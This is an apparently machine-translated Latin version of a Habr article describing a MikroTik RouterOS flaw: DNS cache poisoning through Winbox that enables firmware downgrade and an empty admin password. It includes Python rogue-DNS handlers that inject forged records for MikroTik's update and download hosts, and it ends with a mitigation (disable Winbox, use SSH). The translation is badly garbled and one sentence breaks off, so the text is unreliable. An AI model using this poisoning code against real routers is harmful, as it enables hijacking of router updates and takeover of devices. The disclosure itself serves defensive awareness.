Facultas machinarum gradationis remotae secundum RouterOS (Mikrotik) centena milia machinarum retis in periculo ponit. Consociata vulnerabilitas veneficii DNS cella protocolli Winbox et sinit te outdated onerare (cum reset password defaltam) vel mutata firmware in fabrica.
Vulnerability details
RouterOS terminatio solutionem mandati pro DNS lookup sustinet.
Haec petitio tractatur a resolvente binario nomine. Resolver unus e multis binariis quae cum protocollo Winbox RouterOS coniungunt. In alta planitie, "nuntiae" ad portum Winbox missae possunt variis binariis in RouterOS fundi secundum rationem ordinatae numerorum numerorum.
Defalta, RouterOS plumam debilem DNS habet.
Tamen, etiam cum munus ministri debilitatum est, iter itineris conservat suum cella DNS.
Cum petierimus utendo winbox_dns_request exempli gratia.com, iter exitum capiet.
Cum denotare possumus DNS server, per quod petitio debet, intrantes orationes falsas leve est. Exempli gratia, DNS exsequendum servo configurare potes
def dns_response(data):
request = DNSRecord.parse(data)
reply = DNSRecord(DNSHeader(
id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
print("---- Reply:n", reply)
return reply.pack()
Nunc si exempli gratia quaeras.com Winbox utens, videre potes venenum DNS navigatri.
Utique veneficii example.com non admodum utile est cum iter actu non utatur. Sed iter itineris accedere debet upgrade.mikrotik.com, cloud.mikrotik.com, cloud2.mikrotik.com ac download.mikrotik.com. Et per alium errorem potest omnes simul veneno.
def dns_response(data):
request = DNSRecord.parse(data)
reply = DNSRecord(DNSHeader(
id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
reply.add_answer(RR("upgrade.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("cloud.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("cloud2.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("download.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
print("---- Reply:n", reply)
return reply.pack()
Iter unum petit veniam, quinque remittit. Iter non omnia haec responsa recte colligit.
Patet, hoc etiam impetus utilis est si iter agens pro servo DNS, quia clientes itineris oppugnari permittit.
Hic impetus etiam permittit ut graviore passibilitate uti: downgradum vel reducere versionem RouterOS. Percussor logicam servo renovationis, incluso changelogo, recreat, et copias RouterOS ad versionem hodiernam (vulnerabilem) perspiciendam. Periculum hic positum est in eo quod cum versione "renovata est", administrator tesserae valorem default default repositum est - oppugnator potes in systemate tessera inani!
Oppugnatio omnino laborat, non obstante quod
praesidium
Simpliciter inactivare Winbox permittit te ut te ab his oppugnationibus defendas. Quamvis commoditas administrationis per Winbox, melius est protocollo SSH uti.
Source: www.habr.com